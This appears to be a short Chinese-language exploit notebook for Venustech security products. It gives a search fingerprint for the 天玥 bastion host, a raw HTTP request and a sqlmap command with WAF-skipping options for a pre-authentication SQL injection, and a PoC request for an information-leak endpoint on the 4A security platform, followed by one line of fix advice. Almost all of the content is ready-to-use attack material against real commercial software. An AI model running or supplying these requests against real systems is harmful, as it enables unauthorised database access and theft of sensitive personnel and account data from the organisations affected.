启明星辰
目录
天钥堡垒机
app="启明星辰-天玥网络安全审计"
前台sql注入
POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1
Host: ****
Connection: close
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Language: zh-CN,zh;q=0.9
Cookie: ****
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
checkname=123&tagid=123
sqlmap -u "https\:///ops/index.php?c=Reportguide\&a=checkrn" --data "checkname=123\&tagid=123" -v3 --skip-waf --random-agent
统一安全管理平台
启明星辰-4A 统一安全管控平台 getMater 信息泄漏
漏洞描述:
启明星辰集团4A统一安全管控平台实现IT资源集中管理,为企业提供集中的账号、认证、授权、审计管理技术支撑及配套流程,提升系统安全性和可管理能力。可获取相关人员敏感信息。
poc: relative: req0 session: false requests: - method: GET timeout: 10 path: /accountApi/getMaster.do headers: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.881.36 Safari/537.36 follow_redirects: true matches: (code.eq("200") && body.contains("\"state\":true"))
修复建议:
限制文件访问